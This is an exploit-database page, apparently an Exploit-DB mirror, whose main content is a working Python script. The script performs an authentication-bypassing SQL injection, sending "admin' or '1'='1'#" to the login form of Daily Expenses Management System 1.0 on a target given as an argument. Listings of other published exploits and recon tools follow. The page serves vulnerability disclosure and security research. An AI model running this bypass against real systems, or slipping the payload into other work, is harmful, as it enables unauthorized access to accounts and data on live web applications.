Search for hundreds of thousands of exploits

"Daily Expenses Management System 1.0 - 'username' SQL Injection"

Author

Exploit author

"Daniel Ortiz"

Platform

Exploit platform

php

Release date

Exploit published date

2020-08-04

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection
# Exploit Author: Daniel Ortiz
# Date: 2020-08-01
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Tested on: XAMPP Version 5.6.40 / Windows 10
# Software Link:  https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html

import sys
import requests
import urllib3
import re
import time


urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)

def make_request(url, payload):
    
    p = {"http":"127.0.0.1:8080", "https": "127.0.0.1:8080"}
    s = requests.Session()
    r = s.post(url, data=payload, proxies=p)
    return r

if __name__ == '__main__':

    if len(sys.argv) != 2:
        print("[*] Daily Expenses Management System | username SQL injection")
        print("[*] usage: %s  TARGET" % sys.argv[0])
        print("[*] e.g: %s  192.168.0.10" % sys.argv[0]) 
        sys.exit(-1)

    TARGET = sys.argv[1]
    LOGIN_FORM = "http://%s/dets/" % TARGET
    
    
    # Step 1 - Bypass login form

    url = LOGIN_FORM
    p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'} 
    r = make_request(url, p1)
    print("[+] Endpoint: %s") % LOGIN_FORM
    print("[+] Making requests with payload: %s") % p1

    if re.findall('Dashboard', r.text):
        print("[+] Target vulnerable")
    else:
        print("[-] Error !!!")
Release Date Title Type Platform Author
2020-09-21 "ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path" local windows "Burhanettin Ozgenc"
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-21 "Mida eFramework 2.9.0 - Back Door Access" webapps hardware elbae
2020-09-21 "BlackCat CMS 1.3.6 - Cross-Site Request Forgery" webapps php Noth
2020-09-21 "Seat Reservation System 1.0 - 'id' SQL Injection" webapps php Augkim
2020-09-21 "Online Shop Project 1.0 - 'p' SQL Injection" webapps php Augkim
2020-09-18 "Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)" webapps php "Nikolas Geiselman"
2020-09-18 "SpamTitan 7.07 - Remote Code Execution (Authenticated)" webapps multiple "Felipe Molina"
2020-09-17 "Microsoft SQL Server Reporting Services 2016 - Remote Code Execution" remote windows "West Shepherd"
2020-09-16 "Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software" local windows hyp3rlinx
Release Date Title Type Platform Author
2020-09-21 "Seat Reservation System 1.0 - 'id' SQL Injection" webapps php Augkim
2020-09-21 "BlackCat CMS 1.3.6 - Cross-Site Request Forgery" webapps php Noth
2020-09-21 "Online Shop Project 1.0 - 'p' SQL Injection" webapps php Augkim
2020-09-18 "Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)" webapps php "Nikolas Geiselman"
2020-09-16 "Piwigo 2.10.1 - Cross Site Scripting" webapps php Iridium
2020-09-15 "Tailor MS 1.0 - Reflected Cross-Site Scripting" webapps php boku
2020-09-15 "ThinkAdmin 6 - Arbitrarily File Read" webapps php Hzllaga
2020-09-14 "Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)" webapps php "Mehmet Kelepçe"
2020-09-10 "CuteNews 2.1.2 - Remote Code Execution" webapps php "Musyoka Ian"
2020-09-09 "Tailor Management System - 'id' SQL Injection" webapps php Mosaaed
Release Date Title Type Platform Author
2020-08-04 "Daily Expenses Management System 1.0 - 'username' SQL Injection" webapps php "Daniel Ortiz"
2020-05-21 "forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email)" webapps php "Daniel Ortiz"
2020-05-18 "forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting" webapps php "Daniel Ortiz"
2020-05-14 "Complaint Management System 1.0 - 'username' SQL Injection" webapps php "Daniel Ortiz"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48730/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.